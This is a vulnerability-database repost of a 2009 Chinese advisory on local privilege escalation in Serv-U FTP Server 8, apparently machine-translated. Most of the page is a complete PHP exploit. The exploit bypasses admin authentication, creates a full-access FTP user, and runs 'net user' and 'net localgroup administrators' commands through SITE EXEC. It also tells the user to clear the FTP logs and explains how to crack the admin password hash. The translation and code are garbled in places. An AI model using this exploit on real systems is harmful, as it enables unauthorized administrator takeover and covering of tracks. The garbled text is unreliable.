Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200924160
HistoryAug 05, 2009 - 12:00 a.m.

Serv-U FTP Server v8 local mention right-vulnerability warning-the black bar safety net

2009-08-0500:00:00
佚名
www.myhack58.com
19
JSON

Author: the emptiness of the prodigal son heart

**Release date:**2009-08-05 **Updated date:**2009-08-05

Affected systems:
serv-u8

Not affected system:
Other versions are not affected

Description:
See cnbeta found su 8 This version.
Think before write a 7 local mention right.
Don’t know 8 what the security aspect of the change.
Download to research, find actually can still provide the right, just su7 that can not be directly used, slightly modified the execution processes.

Su8 Management Platform is http, inherited su7 way.
Capture, analysis, found the following walk can be utilized.
1, The administrator from the Management Console open the web page, is not required to verify the password.
2, The administrator if using a URL to open the web page, although the need to enter a password, but no matter what to enter, can enter.“/? Session=3 9 8 9 3&Language=zh,CN&LocalAdmin=1”
3, The administrator can add users there are two, one is a global user, one is a domain user. While the permission set is also two, one is global, one is for the user.
4, The administrator added the user of this package and set the permissions for this pack, is separate.
So, I can capture and then converted into a php socket connection post out.
Finally, in classic ftp login, and exec commands. To improve the right.

Front of the su7 has been said a lot, here simply put the lower the better.
… Landing or something.
1, to obtain the ID.
2, give this id to add the permission.
3, to the id given the user name, password, directory, and permissions.
4, the landing after the execution of the system command.

This code is not directly when the tool is used.

<*source: kxlzx(www.inbreak.net to
*>

Test method:

The following procedures(methods)may carry offensive, for security research and teaching purposes. The user at your own risk!

<?
/*
serv-u 8 local exp ver 1.0
If you are on your own server find this file, Eritrea and… That’s too bad, Don’t come looking for me.
This file is everywhere, everyone can get to.
*/

?& gt;
<html>
<title>Serv-u 8 local exp ver 1.0</title>
<body>
<script>
function fun_showDiv(show)
{
document. getElementById(show). style. display=“block”;
}
</script>
<b>Serv-u 8 local exp ver 1.0</b>
<form id=“form1” name=“form1” method=“post” action=“?”& gt;
<p><a href=“#” >admin password</a>
<input type=“text” name=“admin_pwd” value=“” />
</p>
<p>directly mention the rights!
<input type=“submit” name=“cmd” value=“right” />
<a href=“#” >QA</a>
</p>
<pre>

<?

//Global var
$port=4 3 9 5 8;
$host=“127.0.0.1”;
$sessionid=“”;
$getuserid=“”;
$ftpport=2 1;
$ftpuser=“lalala_hacked”;
$ftppwd=$_POST[‘admin_pwd’];
$exec_addUser=“site exec c:/windows/system32/net.exe user “.$ ftpuser.” “.$ ftppwd.” /add”;
$exec_addGroup=“site exec c:/windows/system32/net.exe localgroup administrators “.$ ftpuser.” /add”;

if($_POST[‘cmd’]) {

//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL=‘/Web%20Client/Login. xml? Command=Login&Sync=1 5 4 3 5 4 3 5 4 3 5 4 3 5 4 3’;
$post_data_login[‘user’] = “”;
$post_data_login[‘pword’] = $ftppwd;
$post_data_login[‘language’] = “zh%2CCN&”;
$ref=“http://”.$ host.“:”.$ port.“/? Session=3 9 8 9 3&Language=zh,CN&LocalAdmin=1”;
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1 2 8 0);
$sessionid = getmidstr(“<sessionid>”,“</sessionid>”,$result);
if ($sessionid!=“”)
echo “login success!”;
fclose($sock_login);
//login-----------------------------------------

//getOrganizationId-------------------------------
$OrganizationId=“”;
$sock_OrganizationId = fsockopen($host, $port);
$URL=‘/Admin/ServerUsers. htm? Page=1’;
$postStr = createRequest($port,$host,$URL,“”,$sessionid,“”);
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId=“”;
while(! feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1 0 2 4);
$resultOrganizationId=$resultOrganizationId.$ result;
}
$strTmp = “OrganizationUsers. xml&ID=”;
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+1 5);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,“"”));
fclose($sock_OrganizationId);
if ($OrganizationId!=“”)
echo “get OrganizationId”.$ OrganizationId." Success!";
//getOrganizationId-------------------------------

//getuserid---------------------------------------
$getuserid=“”;
$sock_getuserid = fsockopen($host, $port);
$URL=“/Admin/XML/User. xml? Command=AddObject&Object=COrganization.”.$ OrganizationId.“. User&Temp=1&Sync=5 4 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 3”;
$ref=“http://”.$ host.“:”.$ port.“/ Admin/ServerUsers. htm? Page=1”;
$post_data_getuserid=“”;
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1 2 8 0);
$result = getmidstr(“<var name="ObjectID" val="”,“" />”,$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!=“”)
echo “get user ID”.$ getuserid." Success!";
//getuserid---------------------------------------

//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL=“/Admin/XML/Result. xml? Command=AddObject&Object=CUser.”.$ getuserid.“. DirAccess&Sync=1 2 2 7 0 8 1 4 3 7 8 2 8”;
$post_data_addpower[‘Access’] = “7 9 9 9”;
$post_data_addpower[‘MaxSize’] = “0”;
$post_data_addpower[‘Dir’] = “c:\";
$post_data_addpower[‘undefined’] = “undefined”;
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,“http://127.0.0.1”.”:“.$ port.”/ Admin/ServerUsers. htm? Page=1");
fputs($sock_addpower, $postStr,strlen($postStr));
$result = fread($sock_addpower, 1 2 8 0);
fclose($sock_addpower);

echo “permissions added successfully!”;

//addpower-----------------------------------------

//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL=“/Admin/XML/Result. xml? Command=UpdateObject&Object=COrganization.”.$ OrganizationId.“. User.”.$ getuserid.“& amp;Sync=1 2 2 7 0 7 1 1 9 0 2 5 0”;
$post_data_adduser[‘LoginID’] = $ftpuser;
$post_data_adduser[‘FullName’] = “”;
$post_data_adduser[‘Password’] = ‘!’;
$post_data_adduser[‘ComboPasswordType’] = “%E5%B8%B8%E8%A7%8 4%E5%AF%8 6%E7%A0%8 1”;
$post_data_adduser[‘PasswordType’] = “0”;
$post_data_adduser[‘ComboAdminType’] = “%E6%9 7%A0%E6%9D%8 3%E9%9 9% 9 0”;
$post_data_adduser[‘AdminType’] = “”;
$post_data_adduser[‘ComboHomeDir’] = “/c:”;
$post_data_adduser[‘HomeDir’] = “/c:”;
$post_data_adduser[‘ComboType’] = “%E6%B0%B8%E4%B9%8 5%E5%B8%9 0%E6%8 8%B7”;
$post_data_adduser[‘Type’] = “0”;
$post_data_adduser[‘ExpiresOn’] = “0”;
$post_data_adduser[‘ComboWebClientStartupMode’] = “%E6%8F%9 0%E7%A4%BA%E7%9 4%A8%E6%8 8%B7%E4%BD%BF%E7%9 4%A8%E4%BD%9 5%E7%A7%8D%E5%AE%A2%E6%8 8%B7%E7%AB%AF”;
$post_data_adduser[‘WebClientStartupMode’] = “”;
$post_data_adduser[‘LockInHomeDir’] = “0”;
$post_data_adduser[‘Enabled’] = “1”;
$post_data_adduser[‘AlwaysAllowLogin’] = “1”;
$post_data_adduser[‘Description’] = “”;
$post_data_adduser[‘IncludeRespCodesInMsgFiles’] = “”;
$post_data_adduser[‘ComboSignOnMessageFilePath’] = “”;
$post_data_adduser[‘SignOnMessageFilePath’] = “”;
$post_data_adduser[‘SignOnMessage’] = “”;
$post_data_adduser[‘SignOnMessageText’] = “”;
$post_data_adduser[‘ComboLimitType’] = “%E8%BF%9E%E6%8E%A5”;
$post_data_adduser[‘LimitType’] = “Connection”;
$post_data_adduser[‘QuotaBytes’] = “0”;
$post_data_adduser[‘Quota’] = “0”;
$post_data_adduser[‘Access’] = “7 9 9 9”;
$post_data_adduser[‘MaxSize’] = “0”;
$post_data_adduser[‘Dir’] = “%25HOME%2 5”;
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,“http://127.0.0.1”.“:”.$ port.“/ Admin/ServerUsers. htm? Page=1”);
fputs($sock_adduser, $postStr,strlen($postStr));
$result = fread($sock_adduser, 1 2 8 0);
fclose($sock_adduser);

echo “added user successfully!”;
//adduser-----------------------------------------

//exec-------------------------------
$sock_exec = fsockopen(“127.0.0.1”, $ftpport, &$errno, &$errstr, 1 0);
$recvbuf = fgets($sock_exec, 1 0 2 4);
$sendbuf = “USER “.$ ftpuser.””;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);

$sendbuf = “PASS!”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);

$sendbuf = $exec_addUser.“”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1 0 2 4);
echo “executing”.$ exec_addUser." Return$recvbuf";
fclose($sock_exec);

$sock_exec = fsockopen(“127.0.0.1”, $ftpport, &$errno, &$errstr, 1 0);
$recvbuf = fgets($sock_exec, 1 0 2 4);
$sendbuf = “USER “.$ ftpuser.””;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);

$sendbuf = “PASS!”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);

$sendbuf = $exec_addGroup.“”;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1 0 2 4);

echo “executing”.$ exec_addGroup." Return$recvbuf";
fclose($sock_exec);
echo “well, Your 3 3 8 9 up clean-up ftp users log right now!”;
//exec-------------------------------

}

/** function createRequest
@port_post : administrator port $port=4 3 9 5 8;
@host_post : host $host=“127.0.0.1”;
@URL_post : target $URL=‘/Web%20Client/Login. xml? Command=Login&Sync=1 5 4 3 5 4 3 5 4 3 5 4 3 5 4 3’;
@post_data_post : arraylist $post_data[‘user’] = “”;…
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string=“”;
if ($post_data_post!=“”)
{
foreach($post_data_post as $key=>$value)
{
$values[]=“$key=”. urlencode($value);
}
$data_string=implode(“”,$values);
}
$request.=" POST “.$ URL_post.” HTTP/1.1";
$request.=" Host: “.$ host_post.”“;
$request.=” Referer: “.$ referer.”“;
$request.=” Content-type: application/x-www-form-urlencoded";
$request.=" Content-length: “. strlen($data_string).”“;
$request.=” User-Agent: Serv-U";
$request.=" x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; . NET CLR 1.1.4322)“;
$request.=” Accept: /“;
$request.=” Cache-Contr no-cache";
$request.=" UA-CPU: x86";

if ($sessionid!=“”)
{
$request.=" Cookie: Session=“.$ sessionid.”“;
}
$request.=”“;
$request.=$ data_string.”";

return $request;
}

//getMidfor2str copy from the internet
function getmidstr($L,$R,$str)
{
$int_l=strpos($str,$L);
$int_r=strpos($str,$R);
If ($int_l>-1&&$int_l>-1)
{
$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
return $str_put;
}
else
return “not found required variable”;
}
?& gt;
</pre>
</form>
<div id=“adminpassdiv” style=“display:none”>
<pre>
The default is empty, if the password is empty, the<b>to fill anything in.& lt;/b>
If modified, the administrator password the default will be here:
<b>C:\Program Files\RhinoSoft. com\Serv-U\Users\Local Administrator Domain\. Archive</b>
File find a MD5 password value.
C:\Program Files\RhinoSoft. com\Serv-U
Is su to the root directory.
Password value of style is(assuming that is 1 2 3 4 5 6)
kx#######################
#Representatives 1 2 3 4 5 6 a 3 2-bit MD5 encryption, and kx is su to the md5 cryptographic algorithm to improve the random 2-bit characters.
After the break the password is<b>kx</b>1 2 3 4 5 6 Remove the kx is the password.
You can for this encryption to generate a dictionary.

</pre>
</div>
<div id=“QAdiv” style=“display:none”>
<pre>
<b>mention the right to the principle?& lt;/b>
Su8 Management Platform is http, inherited su7 way.
Capture, analysis, found the following walk can be utilized.
1, The administrator from the Management Console open the web page, is not required to verify the password.
2, The administrator if using a URL to open the web page, although the need to enter a password, but no matter what to enter, can enter.“/? Session=3 9 8 9 3&Language=zh,CN&LocalAdmin=1”
3, The administrator can add users there are two, one is a global user, one is a domain user. While the permission set is also two, one is global, one is for the user.
4, The administrator added the user of this package and set the permissions for this pack, is separate.
So, I can capture and then converted into a php socket connection post out.
Finally, in classic ftp login, and exec commands. To improve the right.

Front of the su7 has been said a lot, here simply put the lower the better.
… Landing or something.
1, to obtain the ID.
2, give this id to add the permission.
3, to the id given the user name, password, directory, and permissions.
4, the landing after the execution of the system command.

<b>why do I show a success, but it does not mention up there?& lt;/b>
It depends on error code, here even very ashamed, and did not write a detailed error code of the judge.
Generally have the following several situations:
1, It may be because the administrator password is wrong.
Referring to the administrator password of the connection.
2, it may be because the administrator limits the execution of the SITE EXEC.
To be program modifications, the program can be added to a so that he does not limit function.
3, may be a program problem.

</pre>
</div>
</body>
</html>

Recommendation:
The current vendor does not have any patch, or we wait for?
But before SU7 local overflow launched, I didn’t see what movement. -_ -!
First, the local management password modification complex to cope with it.

JSON